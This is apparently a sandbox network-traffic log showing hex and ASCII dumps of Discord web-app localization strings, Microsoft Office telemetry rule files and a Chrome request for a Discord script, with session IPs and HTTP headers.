                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 32 30 33 34 36 22 5d 2c 7b 32 33 37 32 36 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6f 2c 74 29 7b 74 2e 72 28 6f 29 2c 6f 2e 64 65 66 61 75 6c 74 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 27 7b 22 31 34 6f 39 5a 57 22 3a 22 47 6d 61 69 6c 22 2c 22 64 6e 4f 63 2f 76 22 3a 22 57 65 20 70 6c 61 79 20 74 6f 67 65 74 68 65 72 20 74 6f 20 77 69 6e 2c 20 72 61 6e 6b 20 75 70 2c 20 6f 72 20 62 65 61 74 20 63 68 61 6c 6c 65 6e 67 65 73 2e 22 2c 22 58 45 30 74 4c 53 22 3a 22 4a 6f 69 6e 20 41 70 70 6c 69 63 61 74 69 6f 6e
                                                                                                                                                                                                                                                                                    Data Ascii: "use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["20346"],{237267:function(e,o,t){t.r(o),o.default=JSON.parse('{"14o9ZW":"Gmail","dnOc/v":"We play together to win, rank up, or beat challenges.","XE0tLS":"Join Application
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC1369INData Raw: 6e 64 73 22 5d 2c 22 20 46 72 69 65 6e 64 73 22 5d 7d 2c 30 2c 22 63 61 72 64 69 6e 61 6c 22 5d 2c 22 20 69 6e 20 22 2c 5b 31 2c 22 67 75 69 6c 64 4e 61 6d 65 22 5d 5d 2c 22 7a 6a 59 79 70 61 22 3a 5b 22 56 69 65 77 20 22 2c 5b 38 2c 22 74 65 72 6d 73 48 6f 6f 6b 22 2c 5b 22 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 22 5d 5d 2c 22 20 61 6e 64 20 22 2c 5b 38 2c 22 70 72 69 76 61 63 79 48 6f 6f 6b 22 2c 5b 22 50 72 69 76 61 63 79 20 50 6f 6c 69 63 79 22 5d 5d 5d 2c 22 4c 68 6c 67 59 32 22 3a 22 47 65 74 20 53 74 61 72 74 65 64 22 2c 22 31 42 45 53 48 42 22 3a 22 4c 6f 72 65 6d 2c 20 69 70 73 75 6d 22 2c 22 4f 45 7a 41 51 45 22 3a 5b 22 42 79 20 62 65 63 6f 6d 69 6e 67 20 61 20 47 75 69 6c 64 2c 20 79 6f 75 20 61 67 72 65 65 20 74 68 61 74 20 79 6f 75
                                                                                                                                                                                                                                                                                    Data Ascii: nds"]," Friends"]},0,"cardinal"]," in ",[1,"guildName"]],"zjYypa":["View ",[8,"termsHook",["Terms of Service"]]," and ",[8,"privacyHook",["Privacy Policy"]]],"LhlgY2":"Get Started","1BESHB":"Lorem, ipsum","OEzAQE":["By becoming a Guild, you agree that you
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC1369INData Raw: 22 2c 22 31 45 2f 56 47 68 22 3a 22 63 68 61 6e 6e 65 6c 2d 62 61 73 65 64 22 2c 22 44 38 63 30 33 39 22 3a 22 54 65 6c 6c 20 75 73 20 61 62 6f 75 74 20 79 6f 75 72 20 63 6f 6d 6d 75 6e 69 74 79 20 65 78 70 65 72 69 65 6e 63 65 22 2c 22 36 75 6d 4c 2b 2f 22 3a 22 53 65 6c 65 63 74 20 47 61 6d 65 73 22 2c 22 63 32 78 38 6f 36 22 3a 22 48 61 72 6d 66 75 6c 20 6d 69 73 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 6f 72 20 67 6c 6f 72 69 66 79 69 6e 67 20 76 69 6f 6c 65 6e 63 65 22 2c 22 67 2b 46 47 37 4f 22 3a 22 70 69 72 61 74 65 2d 6c 69 66 65 22 2c 22 65 79 50 65 66 6e 22 3a 22 42 61 64 67 65 22 2c 22 46 56 7a 6b 54 45 22 3a 22 69 6e 76 65 6e 74 69 76 65 2d 69 6e 74 65 6c 6c 65 63 74 75 61 6c 22 2c 22 78 69 2b 35 35 2b 22 3a 22 44 69 73 63 6f 72 64 20 66 6f 72 20
                                                                                                                                                                                                                                                                                    Data Ascii: ","1E/VGh":"channel-based","D8c039":"Tell us about your community experience","6umL+/":"Select Games","c2x8o6":"Harmful misinformation or glorifying violence","g+FG7O":"pirate-life","eyPefn":"Badge","FVzkTE":"inventive-intellectual","xi+55+":"Discord for
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC1369INData Raw: 3a 22 47 65 74 20 72 65 61 64 79 20 74 6f 20 72 65 70 20 79 6f 75 72 20 47 75 69 6c 64 2c 20 6d 61 6b 65 20 6e 65 77 20 66 72 69 65 6e 64 73 2c 20 61 6e 64 20 70 6c 61 79 20 73 6f 6d 65 20 67 61 6d 65 73 2e 22 2c 22 68 68 4b 70 78 73 22 3a 22 45 58 43 4c 55 53 49 56 45 20 44 49 53 43 4f 52 44 20 49 4e 56 49 54 45 22 2c 22 48 54 32 49 6c 4a 22 3a 22 46 6f 72 77 61 72 64 22 2c 22 4d 75 46 76 34 65 22 3a 22 47 75 69 6c 64 20 42 61 64 67 65 22 2c 22 30 6a 52 6f 73 72 22 3a 22 43 68 61 6e 6e 65 6c 20 50 72 65 66 65 72 65 6e 63 65 73 22 2c 22 50 77 7a 79 79 38 22 3a 22 42 79 20 73 69 67 6e 69 6e 67 20 74 68 69 73 20 63 68 61 72 74 65 72 2c 20 49 20 61 67 72 65 65 20 74 6f 20 67 72 6f 77 20 61 6e 64 20 75 70 68 6f 6c 64 20 74 68 65 20 76 61 6c 75 65 73 20 6f 66
                                                                                                                                                                                                                                                                                    Data Ascii: :"Get ready to rep your Guild, make new friends, and play some games.","hhKpxs":"EXCLUSIVE DISCORD INVITE","HT2IlJ":"Forward","MuFv4e":"Guild Badge","0jRosr":"Channel Preferences","Pwzyy8":"By signing this charter, I agree to grow and uphold the values of
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC1369INData Raw: 6e 65 77 20 74 61 67 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 66 6f 72 20 22 2c 5b 31 2c 22 67 75 69 6c 64 4e 61 6d 65 22 5d 2c 22 2e 20 57 6f 75 6c 64 20 79 6f 75 20 6c 69 6b 65 20 74 6f 20 61 64 6f 70 74 20 69 74 3f 22 5d 2c 22 70 47 36 38 53 55 22 3a 22 45 78 70 6c 6f 72 65 20 63 6f 6d 6d 75 6e 69 74 69 65 73 2c 20 6f 72 20 74 72 79 20 70 6f 70 75 6c 61 72 20 74 61 67 73 20 62 65 6c 6f 77 22 2c 22 45 75 7a 43 45 52 22 3a 22 41 64 64 20 49 6e 61 70 70 72 6f 70 72 69 61 74 65 20 54 69 65 72 20 31 20 57 61 72 6e 69 6e 67 20 28 45 78 70 65 72 69 6d 65 6e 74 61 6c 29 22 2c 22 6f 33 6d 4c 7a 4d 22 3a 5b 5b 38 2c 22 24 70 22 2c 5b 22 59 6f 75 72 20 47 75 69 6c 64 20 69 73 20 61 74 20 74 68 65 20 22 2c 5b 31 2c 22 63 6f 75 6e 74 22 5d 2c 22 20 6d 65 6d 62 65
                                                                                                                                                                                                                                                                                    Data Ascii: new tag is available for ",[1,"guildName"],". Would you like to adopt it?"],"pG68SU":"Explore communities, or try popular tags below","EuzCER":"Add Inappropriate Tier 1 Warning (Experimental)","o3mLzM":[[8,"$p",["Your Guild is at the ",[1,"count"]," membe
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC1369INData Raw: 6f 6e 20 74 68 65 20 77 65 62 22 2c 22 51 2f 4c 4e 69 34 22 3a 5b 5b 38 2c 22 75 73 65 72 48 6f 6f 6b 22 2c 5b 5b 38 2c 22 24 62 22 2c 5b 5b 31 2c 22 75 73 65 72 22 5d 5d 5d 5d 5d 2c 22 20 73 63 68 65 64 75 6c 65 64 20 74 68 65 20 65 76 65 6e 74 20 22 2c 5b 38 2c 22 74 61 72 67 65 74 48 6f 6f 6b 22 2c 5b 22 5c 5c 22 22 2c 5b 31 2c 22 74 61 72 67 65 74 22 5d 2c 22 5c 5c 22 22 5d 5d 5d 2c 22 43 6c 71 36 6b 70 22 3a 22 53 65 72 76 65 72 20 50 72 65 66 65 72 65 6e 63 65 73 22 2c 22 52 46 66 4f 39 76 22 3a 22 43 6c 65 61 72 20 47 75 69 6c 64 20 49 64 65 6e 74 69 74 79 22 2c 22 6b 51 61 65 77 73 22 3a 22 56 65 72 79 20 48 61 72 64 63 6f 72 65 22 2c 22 45 37 59 6d 77 63 22 3a 22 59 6f 75 20 63 61 6e 20 61 6c 77 61 79 73 20 61 64 64 20 6d 6f 72 65 20 67 61 6d 65
                                                                                                                                                                                                                                                                                    Data Ascii: on the web","Q/LNi4":[[8,"userHook",[[8,"$b",[[1,"user"]]]]]," scheduled the event ",[8,"targetHook",["\\"",[1,"target"],"\\""]]],"Clq6kp":"Server Preferences","RFfO9v":"Clear Guild Identity","kQaews":"Very Hardcore","E7Ymwc":"You can always add more game
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC1369INData Raw: 20 75 73 69 6e 67 20 74 68 65 20 22 2c 5b 38 2c 22 24 62 22 2c 5b 5b 38 2c 22 24 6c 69 6e 6b 22 2c 5b 5b 31 2c 22 6b 65 79 62 69 6e 64 22 5d 5d 2c 5b 5b 31 2c 22 6f 6e 43 6c 69 63 6b 22 5d 5d 5d 5d 5d 2c 22 20 6b 65 79 62 69 6e 64 2e 22 5d 2c 22 76 6e 38 36 49 43 22 3a 22 54 68 61 6e 6b 73 20 66 6f 72 20 79 6f 75 72 20 66 65 65 64 62 61 63 6b 21 20 46 65 65 64 62 61 63 6b 20 6c 69 6b 65 20 79 6f 75 72 73 20 68 65 6c 70 73 20 75 73 20 69 6d 70 72 6f 76 65 20 44 69 73 63 6f 72 64 20 73 65 72 76 65 72 73 2e 22 2c 22 36 52 56 74 4c 43 22 3a 22 53 65 61 72 63 68 20 46 61 76 6f 72 69 74 65 73 22 2c 22 48 6b 69 79 70 36 22 3a 5b 22 47 65 74 20 72 65 61 64 79 20 65 76 65 72 79 6f 6e 65 20 2d 2d 20 61 20 22 2c 5b 38 2c 22 75 73 65 72 6e 61 6d 65 48 6f 6f 6b 22 2c
                                                                                                                                                                                                                                                                                    Data Ascii: using the ",[8,"$b",[[8,"$link",[[1,"keybind"]],[[1,"onClick"]]]]]," keybind."],"vn86IC":"Thanks for your feedback! Feedback like yours helps us improve Discord servers.","6RVtLC":"Search Favorites","Hkiyp6":["Get ready everyone -- a ",[8,"usernameHook",
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC1369INData Raw: 73 20 61 72 65 20 64 65 66 61 75 6c 74 20 6d 75 74 65 64 20 75 6e 74 69 6c 20 73 6f 6d 65 62 6f 64 79 20 77 69 74 68 20 74 68 65 20 e2 80 9c 4d 75 74 65 20 4d 65 6d 62 65 72 73 e2 80 9d 20 70 65 72 6d 69 73 73 69 6f 6e 20 75 6e 2d 6d 75 74 65 73 20 74 68 65 6d 2e 22 2c 22 67 6e 4c 4c 53 45 22 3a 22 4f 6e 65 20 55 70 22 2c 22 73 52 37 38 48 52 22 3a 5b 22 52 6f 6c 6c 69 6e 67 20 6f 75 74 20 74 68 65 20 72 65 64 20 63 61 72 70 65 74 20 66 6f 72 20 22 2c 5b 38 2c 22 75 73 65 72 6e 61 6d 65 48 6f 6f 6b 22 2c 5b 5b 31 2c 22 75 73 65 72 6e 61 6d 65 22 5d 5d 5d 2c 22 2e 20 53 61 79 20 68 69 21 22 5d 2c 22 63 62 64 51 79 38 22 3a 22 41 6c 6c 6f 77 73 20 6d 65 6d 62 65 72 73 20 74 6f 20 64 69 73 63 6f 6e 6e 65 63 74 20 6f 74 68 65 72 20 6d 65 6d 62 65 72 73 20 66
                                                                                                                                                                                                                                                                                    Data Ascii: s are default muted until somebody with the Mute Members permission un-mutes them.","gnLLSE":"One Up","sR78HR":["Rolling out the red carpet for ",[8,"usernameHook",[[1,"username"]]],". Say hi!"],"cbdQy8":"Allows members to disconnect other members f
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:43 UTC1369INData Raw: 63 61 74 69 6f 6e 22 2c 22 56 36 39 48 7a 4d 22 3a 22 57 68 61 74 20 64 6f 65 73 20 79 6f 75 72 20 47 75 69 6c 64 20 6c 69 6b 65 20 74 6f 20 74 61 6c 6b 20 61 62 6f 75 74 3f 22 2c 22 43 75 6f 34 34 4f 22 3a 22 48 69 64 65 20 44 72 61 77 69 6e 67 73 20 69 6e 20 4f 76 65 72 6c 61 79 22 2c 22 32 41 66 2f 5a 57 22 3a 22 57 65 20 70 6c 61 79 20 74 6f 20 63 68 69 6c 6c 20 61 6e 64 20 68 61 76 65 20 66 75 6e 2c 20 62 75 74 20 6d 6f 72 65 20 66 75 6e 20 69 66 20 77 65 20 77 69 6e 21 22 2c 22 41 63 32 4f 5a 47 22 3a 22 41 4c 50 48 41 22 2c 22 2b 71 69 63 44 41 22 3a 5b 22 2e 2e 2e 69 6e 20 6f 72 64 65 72 20 74 6f 20 63 72 65 61 74 65 20 61 20 22 2c 5b 38 2c 22 24 62 22 2c 5b 5b 31 2c 22 70 6c 61 79 73 74 79 6c 65 22 5d 5d 5d 2c 22 20 73 70 61 63 65 20 74 6f 20 70
                                                                                                                                                                                                                                                                                    Data Ascii: cation","V69HzM":"What does your Guild like to talk about?","Cuo44O":"Hide Drawings in Overlay","2Af/ZW":"We play to chill and have fun, but more fun if we win!","Ac2OZG":"ALPHA","+qicDA":["...in order to create a ",[8,"$b",[[1,"playstyle"]]]," space to p
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:43 UTC1369INData Raw: 65 20 63 68 65 63 6b 20 62 61 63 6b 20 6c 61 74 65 72 22 2c 22 33 65 5a 50 38 2f 22 3a 22 47 75 69 6c 64 20 54 61 67 22 2c 22 70 4e 74 43 67 6f 22 3a 22 50 6c 65 61 73 65 20 72 65 73 6f 6c 76 65 20 73 74 65 70 73 20 6d 61 72 6b 65 64 20 61 73 20 65 72 72 6f 72 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 22 2c 22 4e 33 56 48 6b 35 22 3a 5b 22 68 65 79 20 6a 6f 69 6e 20 6d 65 20 6f 6e 20 44 69 73 63 6f 72 64 21 20 49 6e 76 69 74 65 20 65 78 70 69 72 65 73 20 69 6e 20 22 2c 5b 36 2c 22 6e 75 6d 4d 69 6e 75 74 65 73 22 2c 7b 22 6f 6e 65 22 3a 5b 22 31 20 6d 69 6e 75 74 65 22 5d 2c 22 6f 74 68 65 72 22 3a 5b 5b 31 2c 22 6e 75 6d 4d 69 6e 75 74 65 73 22 5d 2c 22 20 6d 69 6e 75 74 65 73 22 5d 7d 2c 30 2c 22 63 61 72 64 69 6e 61 6c 22 5d 2c 22 2e 20 22 2c 5b 31
                                                                                                                                                                                                                                                                                    Data Ascii: e check back later","3eZP8/":"Guild Tag","pNtCgo":"Please resolve steps marked as error and try again.","N3VHk5":["hey join me on Discord! Invite expires in ",[6,"numMinutes",{"one":["1 minute"],"other":[[1,"numMinutes"]," minutes"]},0,"cardinal"],". ",[1


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    69192.168.2.54978413.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:43 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 404
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 3b4adf5a-d01e-002b-4980-3d25fb000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201243Z-15b8b599d88m7pn7hC1TEB4axw00000003f0000000009kgm
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:43 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    70192.168.2.54978813.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:43 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 479
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                                                                                                                    x-ms-request-id: a1d815ed-301e-0096-3f8c-3ae71d000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201243Z-174c587ffdf9xbcchC1TEBxkz40000000390000000009w1x
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:43 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    71192.168.2.54978513.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:43 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB046B576"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 20e2cd06-701e-005c-2869-3bbb94000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201243Z-178bfbc474bvjk8shC1NYC83ns00000004u0000000008d38
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:43 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    72192.168.2.54978613.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:43 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 400
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                                                                                                                    x-ms-request-id: bfe6d614-201e-006e-7a8c-3abbe3000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201243Z-174c587ffdf89smkhC1TEB697s00000003dg00000000m221
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:43 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    73192.168.2.549794162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC745OUTGET /assets/1bab9b095996b8d024ce.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/assets/ac625b77a0bab0ee72df.js
